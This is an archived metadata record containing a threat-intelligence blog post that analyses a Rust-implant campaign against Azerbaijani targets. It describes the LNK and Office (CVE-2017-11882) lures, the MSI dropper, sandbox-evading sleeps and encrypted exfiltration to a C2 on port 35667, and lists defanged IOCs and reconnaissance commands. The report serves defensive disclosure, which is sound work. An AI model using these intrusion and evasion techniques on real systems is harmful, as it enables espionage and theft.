{ "id": "11a79ab4-06ec-4914-a4ad-717dabc5fb9b", "created_at": "2026-04-06T00:16:54.892448Z", "updated_at": "2026-04-10T03:26:31.614269Z", "deleted_at": null, "sha1_hash": "2d2de14269b82ecb481eb6086b59b6e02d8539ea", "title": "Operation Rusty Flag – A Malicious Campaign Against Azerbaijanian Targets | Deep Instinct", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2274220, "plain_text": "Operation Rusty Flag – A Malicious Campaign Against\r\nAzerbaijanian Targets | Deep Instinct\r\nBy Simon KeninThreat Intelligence Researcher\r\nPublished: 2023-09-14 · Archived: 2026-04-05 13:10:13 UTC\r\nKey takeaways:\r\nThe Deep Instinct Threat Lab has discovered a new operation against Azerbaijanian targets\r\nThe operation has at least two different initial access vectors\r\nThe operation is not associated with a known threat actor; the operation was instead named because of their\r\nnovel malware written in the Rust programming language\r\nOne of the lures used in the operation is a modified document that was used by the Storm-0978 group. This\r\ncould be a deliberate “false flag”\r\nFigure 1: Attack Flow\r\nLNK Vector:\r\nDeep Instinct Threat Lab observed a malicious LNK file with low detections named “1.KARABAKH.jpg.lnk.”\r\nThe file has a double extension to lure the victim to click an image that is related to a military incident in\r\nNagorno-Karabakh.\r\nThe LNK downloads and executes an MSI installer hosted by DropBox:\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 1 of 13\n\nFig 2: LNK arguments\r\nFig 3: OSINT information about MSI uploader from Dropbox\r\nThe MSI file drops an implant written in Rust, an xml file for a scheduled task to execute the implant, and a decoy\r\nimage file:\r\nFigure 4: Decoy image file\r\nThe image file includes watermarks of the symbol of the Azerbaijanian MOD.\r\nOffice False Flag Vector:\r\nOnce we identified the LNK campaign the Deep Instinct Threat Lab attempted to identify additional, related files.\r\nDeep Instinct Threat Lab quickly found another MSI file hosted on DropBox that drops a different variant of the\r\nsame Rust implant; however, the identification of the initial access vector for this campaign was trickier.\r\nThe DropBox URL was masked with a URL shortener (hxxps://t[.]]ly/8CYQW) and the evidence showed that this\r\nURL was invoked via exploitation of Microsoft Equation Editor CVE-2017-11882.\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 2 of 13\n\nDeep Instinct Threat Lab identified a file named “Overview_of_UWCs_UkraineInNATO_campaign.docx” that\r\nwas invoking the request to this shortened URL; however, this filename and its content are known to be associated\r\nwith a Storm-0978 campaign utilizing CVE-2023-36884.\r\nThe identified file even had a comment on VirusTotal that it is related to the Storm-0978 campaign:\r\nFigure 5: VT comment\r\nAfter further investigation it was revealed that this is a different file, not related to the Storm-0978 campaign. The\r\nembedded “afchunk.rtf” file has been replaced and CVE-2023-36884 is not used. Instead, CVE-2017-11882 is\r\nused to download and install the MSI file.\r\nThis action looks like a deliberate false flag attempt to pin this attack on Storm-0978.\r\nFig 6: OSINT information about MSI uploader for Office vector\r\nEven though the initial lure is an Office file, the delivered MSI file also open a decoy file, this time a PDF invoice:\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 3 of 13\n\nFig 7: PDF decoy dropped by Office vector\r\nMSI Analysis:\r\nWhile the initial vectors are different, the execution is the same and it is done by invoking msiexec with URL to\r\nDropBox.\r\nUsing a Linux file command or msitools it seems that the MSI files were created by “MSI Wrapper”\r\nhttps://www.exemsi.com/, which is often used by threat actors to drop malicious files.\r\nThe MSI installers are dropping and executing the Rust implant along with a decoy file and xml file for scheduled\r\ntask.\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 4 of 13\n\nFigure 8: MSI Metadata\r\nRust Implant Analysis:\r\nEach attack had its unique file names and metadata. One of the file Rust Implants named\r\n“WinDefenderHealth.exe” is written in Rust. It is expected to gather information and send it to the attacker server,\r\nwhich is still active at the time of this research.\r\nFigure 9: Metadata of the Rust malware\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 5 of 13\n\nFigure 10: Rust compiler\r\nRust is becoming more popular among malware authors. Security products are not yet detecting Rust malware\r\naccurately, and the reverse engineering process is more complex. The Rust standard library is not familiar to tools\r\nlike IDA and Ghidra. It results in tagging large portions of the code as unknown, and it is difficult to differentiate\r\nthe code of the standard library from the code of the malware. To overcome this, the plugin GhidRust was used,\r\nbut it didn't detect the functions of the standard library. In addition, BinDiff was used. A simple Rust binary was\r\ncompiled and compared against the malware, but very little code was shared. Some open projects for Rust were\r\nused in the malware such as Tokio (a runtime for writing reliable, asynchronous, and slim applications with the\r\nRust programming language), hyper (a fast and correct HTTP implementation for Rust) and Serde JSON (a\r\nframework for serializing and deserializing Rust data structures efficiently and generically). After that part, we\r\nmoved on to dynamic analysis.\r\nOnce the file is executed it goes to sleep for 12 minutes. This is a known method to avoid security researchers and\r\nsandbox’s easy analysis.\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 6 of 13\n\nFigure 11: “Sleep” for 12 minutes\r\nThen it starts collecting information about the infected machine:\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 7 of 13\n\nFigure 12: “Collect” information\r\nFigure 13: Processes collecting information about the PC\r\nThe malware then reads the output of the above executions by redirecting their StdOut to a named pipe. It is\r\nnotable that the values of StdIn, StdOut, and StdErr match the handles of the processes to the named pipes.\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 8 of 13\n\nFigure 14: “Read” the collected information\r\nThe information is gathered leveraging the following template:\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 9 of 13\n\nFigure 15: Sample of the collected info before encryption\r\nThe above information is then encrypted and sent to the attacker server using an uncommon, hardcoded port\r\n35667:\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 10 of 13\n\nFigure 16: Encrypted information being sent to the server\r\nWe have built a script to decrypt the information, available in our Git, that the malware is sending.\r\nAll analyzed files above have a low detection rate on VT at the time. There are zero detections on first seen and\r\nmost of the detections are generic ones.\r\nFigure 17: Detections of the RUST implant in VT. All detections are generic.\r\nWhile the other Rust implant still has zero detections:\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 11 of 13\n\nFigure 18: 2nd Rust implant VT detections\r\nConclusion:\r\nDeep Instinct Threat Lab could not attribute these attacks to any known threat actor. There is a possibility that\r\nthese files are part of a red team exercise.\r\nRegardless of the above statement, the fact that both Rust implants had zero detections when first uploaded to\r\nVirusTotal shows that writing malware in esoteric languages can bypass many security solutions.\r\nMITRE:\r\nTactic Technique Description Observable\r\nDiscovery\r\nT1082 System\r\nInformation\r\nDiscovery\r\nThe malware executes\r\nsysteminfo.exe to gain\r\ninformation about the infected\r\ncomputer\r\nsysteminfo.exe\r\nDiscovery\r\nT1016 System\r\nNetwork\r\nConfiguration\r\nDiscovery\r\nGain detailed information\r\nabout the network interfaces\r\non the system\r\nipconfig.exe /all\r\nDiscovery\r\nT1033 System\r\nOwner/User\r\nDiscovery\r\nGain user, group, and\r\nprivileges information for the\r\nusers\r\nWhoami.exe /all\r\nDiscovery\r\nT1087 Account\r\nDiscovery\r\nGain information about local\r\nor domain accounts on a\r\nsystem\r\nNet.exe user\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 12 of 13\n\nTactic Technique Description Observable\r\nDiscovery\r\nT1057 Process\r\nDiscovery\r\nGain a list of currently running\r\nprocesses, including detailed\r\ninformation about each one\r\nTasklist.exe /v\r\nPersistence\r\nT1053 Scheduled\r\nTask/Job\r\nCreate a scheduled task using\r\nthe xml file\r\nSchtasks.exe\r\nCommand\r\nand Control\r\nT1132 Data\r\nEncoding\r\nEncrypted communication\r\nEncrypted information sent to\r\nthe C2. A tool for decrypting the\r\ninformation is provided in our\r\nGit.\r\nIOC:\r\n78.135.73[.]140\r\nSHA256 Description\r\n463183002d558ec6f4f12475cc81ac2cb8da21549959f587e0fb93bd3353e13e\r\nArchive containing\r\nmalicious Office file\r\nedc531d255b9ae8ae6902dc676f24e95a478576cad297e08e2bbc0b8fe03e4ce Malicious Office file\r\n1546bb5bfc25741434148b77fe51fed7618432a232049b3f6f7210e7fb1f3f0e\r\nMSI file from\r\nhxxps://t[.]ly/8CYQW\r\n387304b50852736281a29d00ed2d8cdb3368d171215f1099b41c404e7e099193\r\nSangforUD.EXE Rust\r\nimplant\r\n0742cd9b92661f23f6b294cc29c814de027b5b64b045e4807fc03123b153bcd5 Decoy PDF file\r\n04725fb5a9e878d68e03176364f3b1057a5c54cca06ec988013a508d6bb29b42 Malicious LNK file\r\n35f2f7cd7945f43d9692b6ea39d82c4fc9b86709b18164ad295ce66ac20fd8e5 MSI file from LNK vector\r\n5327308fee51fc6bb95996c4185c4cfcbac580b747d79363c7cf66505f3ff6db\r\nWinDefenderHealth.EXE\r\nRust implant\r\ne508cafa5c45847ecea35539e836dc9370699d21522839342c3f3573bf550555 Decoy JPEG file\r\nSource: https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets" ], "report_names": [ "operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "555e2cac-931d-4ad4-8eaa-64df6451059d", "created_at": "2023-01-06T13:46:39.48103Z", "updated_at": "2026-04-10T02:00:03.342729Z", "deleted_at": null, "main_name": "RomCom", "aliases": [ "UAT-5647", "Storm-0978" ], "source_name": "MISPGALAXY:RomCom", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d58052ba-978b-4775-985a-26ed8e64f98c", "created_at": "2023-09-07T02:02:48.069895Z", "updated_at": "2026-04-10T02:00:04.946879Z", "deleted_at": null, "main_name": "Tropical Scorpius", "aliases": [ "DEV-0978", "RomCom", "Storm-0671", "Storm-0978", "TA829", "Tropical Scorpius", "UAC-0180", "UNC2596", "Void Rabisu" ], "source_name": "ETDA:Tropical Scorpius", "tools": [ "COLDDRAW", "Cuba", "Industrial Spy", "PEAPOD", "ROMCOM", "ROMCOM RAT", "SingleCamper", "SnipBot" ], "source_id": "ETDA", "reports": null }, { "id": "d7bf9558-5d45-49d0-8e8b-a263701e32ad", "created_at": "2023-10-14T02:03:14.3762Z", "updated_at": "2026-04-10T02:00:04.830277Z", "deleted_at": null, "main_name": "Operation Rusty Flag", "aliases": [], "source_name": "ETDA:Operation Rusty Flag", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434614, "ts_updated_at": 1775791591, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2d2de14269b82ecb481eb6086b59b6e02d8539ea.pdf", "text": "https://archive.orkl.eu/2d2de14269b82ecb481eb6086b59b6e02d8539ea.txt", "img": "https://archive.orkl.eu/2d2de14269b82ecb481eb6086b59b6e02d8539ea.jpg" } }